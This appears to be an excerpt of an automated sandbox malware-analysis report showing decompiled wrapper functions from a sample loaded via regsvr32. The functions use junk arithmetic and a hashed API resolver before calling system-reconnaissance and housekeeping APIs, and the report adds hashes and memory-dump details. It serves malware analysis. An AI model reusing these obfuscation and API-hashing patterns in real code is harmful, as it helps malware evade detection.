                                                                                                                • Opcode ID: 0119f98a9aecafce541f1f720687f33deaabc5244ab0f41ad62cf211dd8c1e68
                                                                                                                • Instruction ID: 857c91be4f7c72cfc49f8aaaebe148a0f78615288c4f13e915f1767d6e3c26b0
                                                                                                                • Opcode Fuzzy Hash: 0119f98a9aecafce541f1f720687f33deaabc5244ab0f41ad62cf211dd8c1e68
                                                                                                                • Instruction Fuzzy Hash: C31125B1D01208BFCF04EFA4D84689EBFB5EB44700F208098F9146A221D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00243DFB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, DWORD* _a12, CHAR* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t29;
                                                                                                                				int _t37;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t29);
                                                                                                                				_v32 = 0x7ac1d8;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v16 = 0x40a286;
                                                                                                                				_v16 = _v16 * 0x73;
                                                                                                                				_v16 = _v16 ^ 0x1d0db636;
                                                                                                                				_v12 = 0xfb0e59;
                                                                                                                				_v12 = _v12 + 0xbc70;
                                                                                                                				_v12 = _v12 ^ 0x00f78533;
                                                                                                                				_v8 = 0x340737;
                                                                                                                				_v8 = _v8 ^ 0x54cf0156;
                                                                                                                				_v8 = _v8 + 0xffff4307;
                                                                                                                				_v8 = _v8 ^ 0x54fc9b2f;
                                                                                                                				E00247F78(__ecx, 0xbd3f148a, __ecx, 0x3d, __ecx, 0xd5ddfd8d);
                                                                                                                				_t37 = GetComputerNameA(_a16, _a12); // executed
                                                                                                                				return _t37;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00243E92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: dc62e1b9005d36cff1b3bafdb194b3dec13264f46844aa8be4cea2cf46798933
                                                                                                                • Instruction ID: 353eca307957aeb931031b996971886bc4e36330228a67a3ea3168f95be8ab5c
                                                                                                                • Opcode Fuzzy Hash: dc62e1b9005d36cff1b3bafdb194b3dec13264f46844aa8be4cea2cf46798933
                                                                                                                • Instruction Fuzzy Hash: 46115371C00209BBDF05DFA9C90699EBBB5EF44300F508198E91066261D7B69B269F92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0024D3BF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				void* _t42;
                                                                                                                
                                                                                                                				E0024C98A(_t35);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v32 = 0x156f1f;
                                                                                                                				_v28 = 0xac465b;
                                                                                                                				_v12 = 0x5a9f31;
                                                                                                                				_v12 = _v12 | 0x782d82f5;
                                                                                                                				_v12 = _v12 >> 2;
                                                                                                                				_v12 = _v12 ^ 0x1e1a9599;
                                                                                                                				_v8 = 0xcf181a;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0xdde24463;
                                                                                                                				_v8 = _v8 * 0x49;
                                                                                                                				_v8 = _v8 ^ 0x16d27299;
                                                                                                                				_v16 = 0xacb41;
                                                                                                                				_v16 = _v16 + 0xffff744f;
                                                                                                                				_v16 = _v16 ^ 0x000a26d4;
                                                                                                                				_t41 = E00247F78(__ecx, 0xbd3f148a, __ecx, 0x1ed, __ecx, 0xf764b4c2);
                                                                                                                				_t42 =  *_t41(_a8, __ecx, __edx, _a4, _a8, _a12); // executed
                                                                                                                				return _t42;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • GetNativeSystemInfo.KERNEL32(000A26D4), ref: 0024D461
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InfoNativeSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1721193555-0
                                                                                                                • Opcode ID: f5169f6260a4bebca4535edc6bf1aa4b70020725f4de7dd9fcc5a4b73058318c
                                                                                                                • Instruction ID: 1081e97ebbdce1a08216d0b51c74b50b98cf7898be7c4bc2f3674a0e2bbb349d
                                                                                                                • Opcode Fuzzy Hash: f5169f6260a4bebca4535edc6bf1aa4b70020725f4de7dd9fcc5a4b73058318c
                                                                                                                • Instruction Fuzzy Hash: 0D1106B5D1120CFBCF04DFE5DA4A9AEBFB0EB00305F61C198E92566251D3B54B549F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0024823E(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t28;
                                                                                                                				void* _t33;
                                                                                                                				void* _t37;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t37 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t28);
                                                                                                                				_v16 = 0xb943dd;
                                                                                                                				_v16 = _v16 ^ 0x066b2295;
                                                                                                                				_v16 = _v16 ^ 0x06d170ab;
                                                                                                                				_v8 = 0x2f21f4;
                                                                                                                				_v8 = _v8 + 0xffff1011;
                                                                                                                				_v8 = _v8 ^ 0x3fb01539;
                                                                                                                				_v8 = _v8 << 0x10;
                                                                                                                				_v8 = _v8 ^ 0x2731cee5;
                                                                                                                				_v12 = 0x733cd3;
                                                                                                                				_v12 = _v12 >> 0xd;
                                                                                                                				_v12 = _v12 + 0xffffe338;
                                                                                                                				_v12 = _v12 ^ 0xfff0c595;
                                                                                                                				_t33 = E00247F78(__ecx, 0xbd3f148a, __ecx, 0x1f7, __ecx, 0x3d7d933d);
                                                                                                                				Process32FirstW(_t37, _a8); // executed
                                                                                                                				return _t33;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • Process32FirstW.KERNEL32(000073AC,06D170AB,?,?,?,?,?,?,?,000073AC), ref: 002482CB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FirstProcess32
                                                                                                                • String ID:
                                                                                                                • API String ID: 2623510744-0
                                                                                                                • Opcode ID: e22307b1a031712957a647e00de3f385f76ac950094eb230400772b66e7a33da
                                                                                                                • Instruction ID: 84017974426876612abb0a0d58e4f539642287fafab2c65ce7fd1590e44e89a9
                                                                                                                • Opcode Fuzzy Hash: e22307b1a031712957a647e00de3f385f76ac950094eb230400772b66e7a33da
                                                                                                                • Instruction Fuzzy Hash: 7F015AB5C1160CFBEB48EFA4890A8EEBBB4EF04314F10C1D8E81567251D7B25B25AF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E002502D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t59;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t75;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t75 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0024C98A(_t45);
                                                                                                                				_v12 = 0xd4268f;
                                                                                                                				_t61 = 0x55;
                                                                                                                				_v12 = _v12 / _t61;
                                                                                                                				_t62 = 0x39;
                                                                                                                				_v12 = _v12 / _t62;
                                                                                                                				_t63 = 0x19;
                                                                                                                				_v12 = _v12 / _t63;
                                                                                                                				_v12 = _v12 ^ 0x00038c24;
                                                                                                                				_v16 = 0xae7fc4;
                                                                                                                				_v16 = _v16 + 0x7c1;
                                                                                                                				_v16 = _v16 ^ 0x00ac1f44;
                                                                                                                				_v8 = 0x83f9bc;
                                                                                                                				_v8 = _v8 ^ 0x1ab9b921;
                                                                                                                				_v8 = _v8 | 0xa5451e1d;
                                                                                                                				_t64 = 0x5c;
                                                                                                                				_v8 = _v8 / _t64;
                                                                                                                				_v8 = _v8 ^ 0x021ff71d;
                                                                                                                				E00247F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
                                                                                                                				_t59 = CloseHandle(_t75); // executed
                                                                                                                				return _t59;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(0067E08B,?,?,?,?,?,?,?,0067E08B), ref: 00250384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 6d6a9da9ee167c0ffcfaf9049369e4b4b8fd48551b1ecc9561baaae6e16352f1
                                                                                                                • Instruction ID: d3982c9f89280e3cd0935f166174b89e3a9bb7fc21467f3b21e7a1d73968973a
                                                                                                                • Opcode Fuzzy Hash: 6d6a9da9ee167c0ffcfaf9049369e4b4b8fd48551b1ecc9561baaae6e16352f1
                                                                                                                • Instruction Fuzzy Hash: 3A114F71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE514A7280E7B15F219F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00246F64(void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, void* _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				void* _t39;
                                                                                                                				int _t48;
                                                                                                                				signed int _t50;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E0024C98A(_t39);
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v24 = 0x12197;
                                                                                                                				_v12 = 0xd3172d;
                                                                                                                				_v12 = _v12 + 0xffff1209;
                                                                                                                				_v12 = _v12 << 6;
                                                                                                                				_v12 = _v12 ^ 0x3487a079;
                                                                                                                				_v16 = 0xdeb36c;
                                                                                                                				_t50 = 0x5e;
                                                                                                                				_v16 = _v16 / _t50;
                                                                                                                				_v16 = _v16 ^ 0x0008bfd5;
                                                                                                                				_v8 = 0x4801f0;
                                                                                                                				_v8 = _v8 + 0x72db;
                                                                                                                				_v8 = _v8 * 0x2f;
                                                                                                                				_v8 = _v8 | 0x09cca24c;
                                                                                                                				_v8 = _v8 ^ 0x0dcd7435;
                                                                                                                				E00247F78(_t50, 0xbd3f148a, _t50, 0x53, _t50, 0x75e733f0);
                                                                                                                				_t48 = HeapFree(_a20, 0, _a12); // executed
                                                                                                                				return _t48;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • HeapFree.KERNEL32(?,00000000,00000000), ref: 0024700D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 5b81e59805672090cd6129493cc81cd3a9a6c4af08f07b6262c5320c5b2d06af
                                                                                                                • Instruction ID: f61db3ac5eae8b524bab8e1e89cf00fd5aab0756f2ab9b470f36ce56041b0d1b
                                                                                                                • Opcode Fuzzy Hash: 5b81e59805672090cd6129493cc81cd3a9a6c4af08f07b6262c5320c5b2d06af
                                                                                                                • Instruction Fuzzy Hash: AF1119B5D0120CFBDF45DFA8DD06A9EBBB0EF04304F108198E91466291D3B25B659F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%